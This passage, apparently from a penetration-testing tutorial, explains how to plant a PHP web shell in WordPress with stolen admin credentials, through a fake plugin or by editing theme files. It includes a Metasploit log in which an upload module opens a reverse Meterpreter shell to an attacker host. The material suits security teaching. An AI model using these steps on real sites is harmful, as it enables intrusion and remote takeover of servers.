After getting WordPress admin credentials, you will need to upload a shell. You can do that by uploading a fake WordPress plugin containing the PHP shell. Or you can go to the Appearance menu and then went to the Editor. On the top of the list, you will find 404.php, you can copy the PHP shell and paste it inside 404.php.
Note: You can also edit other files such as header.php, footer.php ..etc.
If you are lazy 🙂 you can use a Metasploit module called WordPress Admin Shell Upload.
msf exploit(wp_admin_shell_upload) > set USERNAME admin USERNAME => admin msf exploit(wp_admin_shell_upload) > set PASSWORD password123 PASSWORD => password123 msf exploit(wp_admin_shell_upload) > set RHOST 192.168.1.101 RHOST => 192.168.1.101 msf exploit(wp_admin_shell_upload) > exploit [*] Started reverse TCP handler on 192.168.1.100:4444 [*] Authenticating with WordPress using admin:password123... [+] Authenticated with WordPress [*] Preparing payload... [*] Uploading payload... [*] Executing the payload at /wp-content/plugins/ByYCGRdIIA/oEodftPPNp.php... [*] Sending stage (33721 bytes) to 192.168.1.101 [*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:39107)
